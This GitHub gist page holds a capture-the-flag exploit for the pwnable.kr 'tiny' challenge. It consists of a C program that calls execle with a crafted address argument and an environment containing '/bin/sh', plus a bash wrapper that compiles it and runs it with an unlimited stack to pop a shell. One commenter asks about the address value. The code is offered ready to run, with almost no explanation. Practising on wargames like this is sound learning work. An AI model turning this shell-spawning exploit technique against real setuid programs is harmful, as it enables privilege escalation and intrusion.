Instantly share code, notes, and snippets.

Embed
What would you like to do?
Run pwnable-hackerssecret-tiny.sh and you'll pwn the tiny.
#include <stdio.h>
#include <unistd.h>
int main()
{
char *envp[] = {
"env1=1", "env2=2", "env3=3",
"/bin/sh", "env5=5", NULL
};
execle("/home/tiny/tiny", "\xc8\x75\x55\x55",
"A", "A", "A", "A", "A", "A",
"A", "A", "A", "A", NULL, envp);
return 0;
}
#!/usr/bin/env bash
tempfile=$(mktemp -d)
echo $tempfile
cd $tempfile
gcc -xc - -oexp <<\EOF
#include <stdio.h>
#include <unistd.h>
int main()
{
char *envp[] = {
"env1=1", "env2=2", "env3=3",
"/bin/sh", "env5=5", NULL
};
execle("/home/tiny/tiny", "\xc8\x75\x55\x55",
"A", "A", "A", "A", "A", "A",
"A", "A", "A", "A", NULL, envp);
return 0;
}
EOF
ulimit -s unlimited
exec ./exp
@Shviderskiy

This comment has been minimized.

Show comment
Hide comment
@Shviderskiy

Shviderskiy Jul 18, 2016

Hi! I have a small question.
Why execve accepts strange second parameter?
During debugging my gdb shows 0xf77??5c8, but 0x555575c8 never.

Shviderskiy commented Jul 18, 2016

Hi! I have a small question.
Why execve accepts strange second parameter?
During debugging my gdb shows 0xf77??5c8, but 0x555575c8 never.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment